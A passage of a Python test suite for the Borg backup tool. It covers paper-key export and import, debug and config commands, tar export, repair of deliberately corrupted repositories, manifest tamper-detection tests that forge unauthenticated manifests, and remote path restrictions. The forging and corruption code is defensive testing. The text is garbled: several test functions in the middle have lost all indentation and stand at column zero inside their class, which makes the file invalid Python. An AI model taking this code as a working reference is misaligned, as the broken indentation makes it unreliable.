            self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
        else:
            with pytest.raises(RepoIdMismatch):
                self.cmd('key', 'import', self.repository_location, export_file)
    def test_key_export_paperkey(self):
        """'key export --paper' renders the key as a deterministic, human-typable paper key."""
        # Fixed repo id + fixed key material -> the paper-key output is fully deterministic.
        repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
        export_file = self.output_path + '/exported'
        self.cmd('init', self.repository_location, '--encryption', 'keyfile')
        self._set_repository_id(self.repository_path, unhexlify(repo_id))
        key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
        with open(key_file, 'w') as fd:
            fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
            fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
        self.cmd('key', 'export', '--paper', self.repository_location, export_file)
        with open(export_file, 'r') as fd:
            export_contents = fd.read()
        assert export_contents == """To restore key use borg key import --paper /path/to/repo

BORG PAPER KEY v1
id: 2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02
 1: 616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d
 2: 737475 - 88
"""
    def test_key_import_paperkey(self):
        """'key import --paper' re-reads a typed paper key, recovering from typos line by line."""
        repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
        self.cmd('init', self.repository_location, '--encryption', 'keyfile')
        self._set_repository_id(self.repository_path, unhexlify(repo_id))
        # Install deterministic key material so the expected paper-key lines are known.
        key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
        with open(key_file, 'w') as fd:
            fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
            fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
        # Each bad line is rejected and re-prompted; only the final good line advances.
        typed_input = (
            b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 02\n'  # Forgot to type "-"
            b'2 / e29442 3506da 4e1ea7 25f62a 5a3d41 - 02\n'  # Forgot to type second "/"
            b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d42 - 02\n'  # Typo (..42 not ..41)
            b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'  # Correct! Congratulations
            b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
            b'\n\n'  # Abort [yN] => N
            b'737475 88\n'  # missing "-"
            b'73747i - 88\n'  # typo
            b'73747 - 88\n'  # missing nibble
            b'73 74 75 - 89\n'  # line checksum mismatch
            b'00a1 - 88\n'  # line hash collision - overall hash mismatch, have to start over
            b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'
            b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
            b'73 74 75 - 88\n'
        )
        # In case that this has to change, here is a quick way to find a colliding line hash:
        #
        # from hashlib import sha256
        # hash_fn = lambda x: sha256(b'\x00\x02' + x).hexdigest()[:2]
        # for i in range(1000):
        #     if hash_fn(i.to_bytes(2, byteorder='big')) == '88':  # 88 = line hash
        #         print(i.to_bytes(2, 'big'))
        #         break
        self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
        # Test abort paths
        typed_input = b'\ny\n'
        self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
        typed_input = b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n\ny\n'
        self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
def test_debug_dump_manifest(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-manifest', self.repository_location, dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert 'archives' in result
assert 'config' in result
assert 'item_keys' in result
assert 'timestamp' in result
assert 'version' in result
def test_debug_dump_archive(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-archive', self.repository_location + "::test", dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert '_name' in result
assert '_manifest_entry' in result
assert '_meta' in result
assert '_items' in result
    def test_debug_refcount_obj(self):
        """'debug refcount-obj' reports refcounts from the chunks cache and flags bad ids."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('debug', 'refcount-obj', self.repository_location, '0' * 64).strip()
        assert output == 'object 0000000000000000000000000000000000000000000000000000000000000000 not found [info from chunks cache].'
        create_json = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
        archive_id = create_json['archive']['id']
        output = self.cmd('debug', 'refcount-obj', self.repository_location, archive_id).strip()
        assert output == 'object ' + archive_id + ' has 1 referrers [info from chunks cache].'
        # Invalid IDs do not abort or return an error
        output = self.cmd('debug', 'refcount-obj', self.repository_location, '124', 'xyza').strip()
        assert output == 'object id 124 is invalid.\nobject id xyza is invalid.'
    def test_debug_info(self):
        """'debug info' prints build/runtime information."""
        output = self.cmd('debug', 'info')
        assert 'CRC implementation' in output
        assert 'Python' in output
    def test_benchmark_crud(self):
        """Smoke-test 'benchmark crud' (the env var switches it to a tiny test workload)."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        with environment_variable(_BORG_BENCHMARK_CRUD_TEST='YES'):
            self.cmd('benchmark', 'crud', self.repository_location, self.input_path)
    def test_config(self):
        """'borg config' lists, reads, sets, and deletes repository config values."""
        self.create_test_files()
        os.unlink('input/flagfile')
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('config', '--list', self.repository_location)
        self.assert_in('[repository]', output)
        self.assert_in('version', output)
        self.assert_in('segments_per_dir', output)
        self.assert_in('storage_quota', output)
        self.assert_in('append_only', output)
        self.assert_in('additional_free_space', output)
        self.assert_in('id', output)
        for cfg_key, cfg_value in [
            ('additional_free_space', '2G'),
            ('repository.append_only', '1'),
        ]:
            # Read (defaults to '0'), set, read back, delete, then reading fails.
            output = self.cmd('config', self.repository_location, cfg_key)
            assert output == '0' + '\n'
            self.cmd('config', self.repository_location, cfg_key, cfg_value)
            output = self.cmd('config', self.repository_location, cfg_key)
            assert output == cfg_value + '\n'
            self.cmd('config', '--delete', self.repository_location, cfg_key)
            self.cmd('config', self.repository_location, cfg_key, exit_code=1)
        # Usage errors: --list with --delete, no key given, unknown key.
        self.cmd('config', '--list', '--delete', self.repository_location, exit_code=2)
        self.cmd('config', self.repository_location, exit_code=2)
        self.cmd('config', self.repository_location, 'invalid-option', exit_code=1)
requires_gnutar = pytest.mark.skipif(not have_gnutar(), reason='GNU tar must be installed for this test.')
requires_gzip = pytest.mark.skipif(not shutil.which('gzip'), reason='gzip must be installed for this test.')
    @requires_gnutar
    def test_export_tar(self):
        """export-tar writes a plain tar that extracts back to the original input tree."""
        self.create_test_files()
        os.unlink('input/flagfile')
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--progress')
        with changedir('output'):
            # This probably assumes GNU tar. Note -p switch to extract permissions regardless of umask.
            subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
        self.assert_dirs_equal('input', 'output/input', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
@requires_gzip
def test_export_tar_gz(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar.gz', '--list')
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar.gz', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
def test_export_tar_strip_components(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--strip-components=1', '--list')
# --list's path are those before processing with --strip-components
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_hardlinks
@requires_gnutar
def test_export_tar_strip_components_links(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', '--strip-components=2')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
@requires_hardlinks
@requires_gnutar
def test_extract_hardlinks_tar(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', 'input/dir1')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
def test_detect_attic_repo(self):
path = make_attic_repo(self.repository_path)
cmds = [
['create', path + '::test', self.tmpdir],
['extract', path + '::test'],
['check', path],
['rename', path + '::test', 'newname'],
['list', path],
['delete', path],
['prune', path],
['info', path + '::test'],
['key', 'export', path, 'exported'],
['key', 'import', path, 'import'],
['key', 'change-passphrase', path],
['break-lock', path],
]
for args in cmds:
output = self.cmd(*args, fork=True, exit_code=2)
assert 'Attic repository detected.' in output
@unittest.skipUnless('binary' in BORG_EXES, 'no borg.exe available')
class ArchiverTestCaseBinary(ArchiverTestCase):
    """Re-run ArchiverTestCase against the frozen borg.exe binary (always forked)."""
    EXE = 'borg.exe'
    FORK_DEFAULT = True
    # The tests below cannot work against a separate binary process.
    @unittest.skip('does not raise Exception, but sets rc==2')
    def test_init_parent_dirs(self):
        pass
    @unittest.skip('patches objects')
    def test_init_interrupt(self):
        pass
    @unittest.skip('patches objects')
    def test_extract_capabilities(self):
        pass
    @unittest.skip('patches objects')
    def test_extract_xattrs_errors(self):
        pass
    @unittest.skip('test_basic_functionality seems incompatible with fakeroot and/or the binary.')
    def test_basic_functionality(self):
        pass
    @unittest.skip('test_overwrite seems incompatible with fakeroot and/or the binary.')
    def test_overwrite(self):
        pass
    def test_fuse(self):
        """Skip under fakeroot (detected at runtime, so not expressible as a decorator)."""
        if fakeroot_detected():
            # Bug fix: the old code called unittest.skip(...), which merely CREATES
            # a decorator and discards it - the test silently passed without
            # running or being reported as skipped. self.skipTest() actually
            # raises SkipTest.
            self.skipTest('test_fuse with the binary is not compatible with fakeroot')
        else:
            super().test_fuse()
class ArchiverCheckTestCase(ArchiverTestCaseBase):
    """Tests for 'borg check' / 'borg check --repair' against deliberately damaged repos."""
    def setUp(self):
        """Create a repo with two source archives; the tiny ChunkBuffer forces many metadata chunks."""
        super().setUp()
        with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
            self.cmd('init', '--encryption=repokey', self.repository_location)
            self.create_src_archive('archive1')
            self.create_src_archive('archive2')
    def test_check_usage(self):
        """Exercise check's scoping options (--repository-only, --archives-only, filters)."""
        output = self.cmd('check', '-v', '--progress', self.repository_location, exit_code=0)
        self.assert_in('Starting repository check', output)
        self.assert_in('Starting archive consistency check', output)
        self.assert_in('Checking segments', output)
        # reset logging to new process default to avoid need for fork=True on next check
        logging.getLogger('borg.output.progress').setLevel(logging.NOTSET)
        output = self.cmd('check', '-v', '--repository-only', self.repository_location, exit_code=0)
        self.assert_in('Starting repository check', output)
        self.assert_not_in('Starting archive consistency check', output)
        self.assert_not_in('Checking segments', output)
        output = self.cmd('check', '-v', '--archives-only', self.repository_location, exit_code=0)
        self.assert_not_in('Starting repository check', output)
        self.assert_in('Starting archive consistency check', output)
        output = self.cmd('check', '-v', '--archives-only', '--prefix=archive2', self.repository_location, exit_code=0)
        self.assert_not_in('archive1', output)
        output = self.cmd('check', '-v', '--archives-only', '--first=1', self.repository_location, exit_code=0)
        self.assert_in('archive1', output)
        self.assert_not_in('archive2', output)
        output = self.cmd('check', '-v', '--archives-only', '--last=1', self.repository_location, exit_code=0)
        self.assert_not_in('archive1', output)
        self.assert_in('archive2', output)
    def test_missing_file_chunk(self):
        """Delete a file chunk; repair marks the file broken, a later backup heals it."""
        archive, repository = self.open_archive('archive1')
        with repository:
            for item in archive.iter_items():
                if item.path.endswith('testsuite/archiver.py'):
                    valid_chunks = item.chunks
                    killed_chunk = valid_chunks[-1]
                    repository.delete(killed_chunk.id)
                    break
            else:
                self.fail('should not happen')
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        output = self.cmd('check', '--repair', self.repository_location, exit_code=0)
        self.assert_in('New missing file chunk detected', output)
        self.cmd('check', self.repository_location, exit_code=0)
        output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
        self.assert_in('broken#', output)
        # check that the file in the old archives has now a different chunk list without the killed chunk
        for archive_name in ('archive1', 'archive2'):
            archive, repository = self.open_archive(archive_name)
            with repository:
                for item in archive.iter_items():
                    if item.path.endswith('testsuite/archiver.py'):
                        self.assert_not_equal(valid_chunks, item.chunks)
                        self.assert_not_in(killed_chunk, item.chunks)
                        break
                else:
                    self.fail('should not happen')
        # do a fresh backup (that will include the killed chunk)
        with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
            self.create_src_archive('archive3')
        # check should be able to heal the file now:
        output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
        self.assert_in('Healed previously missing file chunk', output)
        self.assert_in('testsuite/archiver.py: Completely healed previously damaged file!', output)
        # check that the file in the old archives has the correct chunks again
        for archive_name in ('archive1', 'archive2'):
            archive, repository = self.open_archive(archive_name)
            with repository:
                for item in archive.iter_items():
                    if item.path.endswith('testsuite/archiver.py'):
                        self.assert_equal(valid_chunks, item.chunks)
                        break
                else:
                    self.fail('should not happen')
        # list is also all-healthy again
        output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
        self.assert_not_in('broken#', output)
    def test_missing_archive_item_chunk(self):
        """Delete an archive metadata (items stream) chunk; repair must recover."""
        archive, repository = self.open_archive('archive1')
        with repository:
            repository.delete(archive.metadata.items[0])
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        self.cmd('check', '--repair', self.repository_location, exit_code=0)
        self.cmd('check', self.repository_location, exit_code=0)
    def test_missing_archive_metadata(self):
        """Delete the archive metadata object itself; repair must recover."""
        archive, repository = self.open_archive('archive1')
        with repository:
            repository.delete(archive.id)
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        self.cmd('check', '--repair', self.repository_location, exit_code=0)
        self.cmd('check', self.repository_location, exit_code=0)
    def test_missing_manifest(self):
        """Delete the manifest; repair must rebuild it, re-finding both archives."""
        archive, repository = self.open_archive('archive1')
        with repository:
            repository.delete(Manifest.MANIFEST_ID)
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
        self.assert_in('archive1', output)
        self.assert_in('archive2', output)
        self.cmd('check', self.repository_location, exit_code=0)
    def test_corrupted_manifest(self):
        """Corrupt the manifest in place; repair must rebuild it, re-finding both archives."""
        archive, repository = self.open_archive('archive1')
        with repository:
            manifest = repository.get(Manifest.MANIFEST_ID)
            corrupted_manifest = manifest + b'corrupted!'
            repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
        self.assert_in('archive1', output)
        self.assert_in('archive2', output)
        self.cmd('check', self.repository_location, exit_code=0)
    def test_manifest_rebuild_corrupted_chunk(self):
        """Manifest rebuild must skip a corrupted archive chunk but keep the intact archive."""
        archive, repository = self.open_archive('archive1')
        with repository:
            manifest = repository.get(Manifest.MANIFEST_ID)
            corrupted_manifest = manifest + b'corrupted!'
            repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
            chunk = repository.get(archive.id)
            corrupted_chunk = chunk + b'corrupted!'
            repository.put(archive.id, corrupted_chunk)
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
        self.assert_in('archive2', output)
        self.cmd('check', self.repository_location, exit_code=0)
    def test_manifest_rebuild_duplicate_archive(self):
        """Manifest rebuild must disambiguate duplicate archive names (-> 'archive1.1')."""
        archive, repository = self.open_archive('archive1')
        key = archive.key
        with repository:
            manifest = repository.get(Manifest.MANIFEST_ID)
            corrupted_manifest = manifest + b'corrupted!'
            repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
            # Inject a second, hand-crafted archive with the same name 'archive1'.
            archive = msgpack.packb({
                'cmdline': [],
                'items': [],
                'hostname': 'foo',
                'username': 'bar',
                'name': 'archive1',
                'time': '2016-12-15T18:49:51.849711',
                'version': 1,
            })
            archive_id = key.id_hash(archive)
            repository.put(archive_id, key.encrypt(archive))
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        self.cmd('check', '--repair', self.repository_location, exit_code=0)
        output = self.cmd('list', self.repository_location)
        self.assert_in('archive1', output)
        self.assert_in('archive1.1', output)
        self.assert_in('archive2', output)
    def test_extra_chunks(self):
        """An orphaned chunk makes check fail until --repair removes it."""
        self.cmd('check', self.repository_location, exit_code=0)
        with Repository(self.repository_location, exclusive=True) as repository:
            repository.put(b'01234567890123456789012345678901', b'xxxx')
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
        self.cmd('check', self.repository_location, exit_code=1)
        self.cmd('check', '--repair', self.repository_location, exit_code=0)
        self.cmd('check', self.repository_location, exit_code=0)
        self.cmd('extract', '--dry-run', self.repository_location + '::archive1', exit_code=0)
    def _test_verify_data(self, *init_args):
        """Shared body: only --verify-data decrypts chunks, so only it finds bit-rot."""
        shutil.rmtree(self.repository_path)
        self.cmd('init', self.repository_location, *init_args)
        self.create_src_archive('archive1')
        archive, repository = self.open_archive('archive1')
        with repository:
            for item in archive.iter_items():
                if item.path.endswith('testsuite/archiver.py'):
                    chunk = item.chunks[-1]
                    data = repository.get(chunk.id) + b'1234'
                    repository.put(chunk.id, data)
                    break
            repository.commit(compact=False)
        # A plain check does not decrypt data, so it cannot see the corruption.
        self.cmd('check', self.repository_location, exit_code=0)
        output = self.cmd('check', '--verify-data', self.repository_location, exit_code=1)
        assert bin_to_hex(chunk.id) + ', integrity error' in output
        # repair (heal is tested in another test)
        output = self.cmd('check', '--repair', '--verify-data', self.repository_location, exit_code=0)
        assert bin_to_hex(chunk.id) + ', integrity error' in output
        assert 'testsuite/archiver.py: New missing file chunk detected' in output
    def test_verify_data(self):
        """--verify-data with an encrypted (repokey) repository."""
        self._test_verify_data('--encryption', 'repokey')
    def test_verify_data_unencrypted(self):
        """--verify-data with an unencrypted repository."""
        self._test_verify_data('--encryption', 'none')
    def test_empty_repository(self):
        """A repository emptied of all objects (including the manifest) must fail check."""
        with Repository(self.repository_location, exclusive=True) as repository:
            for id_ in repository.list():
                repository.delete(id_)
            repository.commit(compact=False)
        self.cmd('check', self.repository_location, exit_code=1)
    def test_attic013_acl_bug(self):
        """Items carrying the spurious b'acl': None pair (Attic <= 0.13) must still pass check."""
        # Attic up to release 0.13 contained a bug where every item unintentionally received
        # a b'acl'=None key-value pair.
        # This bug can still live on in Borg repositories (through borg upgrade).
        class Attic013Item:
            def as_dict(self):
                return {
                    # These are required
                    b'path': '1234',
                    b'mtime': 0,
                    b'mode': 0,
                    b'user': b'0',
                    b'group': b'0',
                    b'uid': 0,
                    b'gid': 0,
                    # acl is the offending key.
                    b'acl': None,
                }
        archive, repository = self.open_archive('archive1')
        with repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            with Cache(repository, key, manifest) as cache:
                archive = Archive(repository, key, manifest, '0.13', cache=cache, create=True)
                archive.items_buffer.add(Attic013Item())
                archive.save()
        self.cmd('check', self.repository_location, exit_code=0)
        self.cmd('list', self.repository_location + '::0.13', exit_code=0)
class ManifestAuthenticationTest(ArchiverTestCaseBase):
    """Tests for TAM (tamper authentication) of the repository manifest."""

    def spoof_manifest(self, repository):
        # Overwrite the manifest with a forged one that carries no 'tam'
        # authentication data, timestamped one day into the future.
        with repository:
            _, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
                'version': 1,
                'archives': {},
                'config': {},
                'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
            })))
            repository.commit(compact=False)

    def test_fresh_init_tam_required(self):
        """A freshly initialized repo must reject an unauthenticated manifest."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository = Repository(self.repository_path, exclusive=True)
        with repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            # Replace the manifest with one lacking the 'tam' key.
            repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
                'version': 1,
                'archives': {},
                'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
            })))
            repository.commit(compact=False)
        with pytest.raises(TAMRequiredError):
            self.cmd('list', self.repository_location)

    def test_not_required(self):
        """With tam_required=False a TAM-less manifest is accepted, until
        'borg upgrade --tam' turns authentication back on."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive1234')
        repository = Repository(self.repository_path, exclusive=True)
        with repository:
            # Drop the security dir so the remembered "tam required" state is gone.
            shutil.rmtree(get_security_dir(bin_to_hex(repository.id)))
            _, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            key.tam_required = False
            key.change_passphrase(key._passphrase)
            # Strip the TAM from the stored manifest.
            manifest = msgpack.unpackb(key.decrypt(None, repository.get(Manifest.MANIFEST_ID)))
            del manifest[b'tam']
            repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb(manifest)))
            repository.commit(compact=False)
        output = self.cmd('list', '--debug', self.repository_location)
        assert 'archive1234' in output
        assert 'TAM not found and not required' in output
        # Run upgrade
        self.cmd('upgrade', '--tam', self.repository_location)
        # Manifest must be authenticated now
        output = self.cmd('list', '--debug', self.repository_location)
        assert 'archive1234' in output
        assert 'TAM-verified manifest' in output
        # Try to spoof / modify pre-1.0.9
        self.spoof_manifest(repository)
        # Fails
        with pytest.raises(TAMRequiredError):
            self.cmd('list', self.repository_location)
        # Force upgrade
        self.cmd('upgrade', '--tam', '--force', self.repository_location)
        self.cmd('list', self.repository_location)

    def test_disable(self):
        """--disable-tam before spoofing: 'list' must still succeed."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive1234')
        self.cmd('upgrade', '--disable-tam', self.repository_location)
        repository = Repository(self.repository_path, exclusive=True)
        self.spoof_manifest(repository)
        assert not self.cmd('list', self.repository_location)

    def test_disable2(self):
        """--disable-tam after spoofing: 'list' must still succeed."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive1234')
        repository = Repository(self.repository_path, exclusive=True)
        self.spoof_manifest(repository)
        self.cmd('upgrade', '--disable-tam', self.repository_location)
        assert not self.cmd('list', self.repository_location)
class RemoteArchiverTestCase(ArchiverTestCase):
    """Re-runs the ArchiverTestCase suite against a RemoteRepository, plus
    tests specific to the remote path/repository restriction options."""
    prefix = '__testsuite__:'

    def open_repository(self):
        # Override: open via the remote (ssh-style) repository implementation.
        return RemoteRepository(Location(self.repository_location))

    def test_remote_repo_restrict_to_path(self):
        """--restrict-to-path must allow only the listed paths (and children)."""
        # restricted to repo directory itself:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
            self.cmd('init', '--encryption=repokey', self.repository_location)
        # restricted to repo directory itself, fail for other directories with same prefix:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
            with pytest.raises(PathNotAllowed):
                self.cmd('init', '--encryption=repokey', self.repository_location + '_0')
        # restricted to a completely different path:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo']):
            with pytest.raises(PathNotAllowed):
                self.cmd('init', '--encryption=repokey', self.repository_location + '_1')
        path_prefix = os.path.dirname(self.repository_path)
        # restrict to repo directory's parent directory:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', path_prefix]):
            self.cmd('init', '--encryption=repokey', self.repository_location + '_2')
        # restrict to repo directory's parent directory and another directory:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo', '--restrict-to-path', path_prefix]):
            self.cmd('init', '--encryption=repokey', self.repository_location + '_3')

    def test_remote_repo_restrict_to_repository(self):
        """--restrict-to-repository must match the repository directory exactly."""
        # restricted to repo directory itself:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', self.repository_path]):
            self.cmd('init', '--encryption=repokey', self.repository_location)
        parent_path = os.path.join(self.repository_path, '..')
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', parent_path]):
            with pytest.raises(PathNotAllowed):
                self.cmd('init', '--encryption=repokey', self.repository_location)

    @unittest.skip('only works locally')
    def test_debug_put_get_delete_obj(self):
        pass

    @unittest.skip('only works locally')
    def test_config(self):
        pass

    def test_strip_components_doesnt_leak(self):
        """Extraction with --strip-components must not leave cached responses
        behind in the RemoteRepository (checked via a debug marker string)."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('dir/file', contents=b"test file contents 1")
        self.create_regular_file('dir/file2', contents=b"test file contents 2")
        self.create_regular_file('skipped-file1', contents=b"test file contents 3")
        self.create_regular_file('skipped-file2', contents=b"test file contents 4")
        self.create_regular_file('skipped-file3', contents=b"test file contents 5")
        self.cmd('create', self.repository_location + '::test', 'input')
        marker = 'cached responses left in RemoteRepository'
        with changedir('output'):
            # Strip all components -> nothing extracted, but no leak either.
            res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '3')
            self.assert_true(marker not in res)
            with self.assert_creates_file('file'):
                res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '2')
                self.assert_true(marker not in res)
            with self.assert_creates_file('dir/file'):
                res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '1')
                self.assert_true(marker not in res)
            with self.assert_creates_file('input/dir/file'):
                res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '0')
                self.assert_true(marker not in res)
class ArchiverCorruptionTestCase(ArchiverTestCaseBase):
    """Tests that deliberately corrupt local cache files and verify borg's reaction."""

    def setUp(self):
        super().setUp()
        self.create_test_files()
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # Cache directory as reported by 'borg info --json'.
        self.cache_path = json.loads(self.cmd('info', self.repository_location, '--json'))['cache']['path']

    def corrupt(self, file):
        # Overwrite the file's last byte to break its integrity checksum.
        with open(file, 'r+b') as fd:
            fd.seek(-1, io.SEEK_END)
            fd.write(b'1')

    def test_cache_chunks(self):
        """A corrupted chunks cache must be detected as an integrity failure."""
        self.corrupt(os.path.join(self.cache_path, 'chunks'))
        if self.FORK_DEFAULT:
            out = self.cmd('info', self.repository_location, exit_code=2)
            assert 'failed integrity check' in out
        else:
            with pytest.raises(FileIntegrityError):
                self.cmd('info', self.repository_location)

    def test_cache_files(self):
        """A corrupted files cache produces a warning; 'create' still works."""
        self.cmd('create', self.repository_location + '::test', 'input')
        self.corrupt(os.path.join(self.cache_path, 'files'))
        out = self.cmd('create', self.repository_location + '::test1', 'input')
        # borg warns about the corrupt files cache, but then continues without files cache.
        assert 'files cache is corrupted' in out

    def test_chunks_archive(self):
        """A corrupted cached archive chunk index is noticed during cache sync
        and rebuilt automatically."""
        self.cmd('create', self.repository_location + '::test1', 'input')
        # Find ID of test1 so we can corrupt it later :)
        target_id = self.cmd('list', self.repository_location, '--format={id}{LF}').strip()
        self.cmd('create', self.repository_location + '::test2', 'input')
        # Force cache sync, creating archive chunks of test1 and test2 in chunks.archive.d
        self.cmd('delete', '--cache-only', self.repository_location)
        self.cmd('info', self.repository_location, '--json')
        chunks_archive = os.path.join(self.cache_path, 'chunks.archive.d')
        assert len(os.listdir(chunks_archive)) == 4  # two archives, one chunks cache and one .integrity file each
        self.corrupt(os.path.join(chunks_archive, target_id + '.compact'))
        # Trigger cache sync by changing the manifest ID in the cache config
        config_path = os.path.join(self.cache_path, 'config')
        config = ConfigParser(interpolation=None)
        config.read(config_path)
        config.set('cache', 'manifest', bin_to_hex(bytes(32)))
        with open(config_path, 'w') as fd:
            config.write(fd)
        # Cache sync notices corrupted archive chunks, but automatically recovers.
        out = self.cmd('create', '-v', self.repository_location + '::test3', 'input', exit_code=1)
        assert 'Reading cached archive chunk index for test1' in out
        assert 'Cached archive chunk index of test1 is corrupted' in out
        assert 'Fetching and building archive index for test1' in out

    def test_old_version_interfered(self):
        # Modify the main manifest ID without touching the manifest ID in the integrity section.
        # This happens if a version without integrity checking modifies the cache.
        config_path = os.path.join(self.cache_path, 'config')
        config = ConfigParser(interpolation=None)
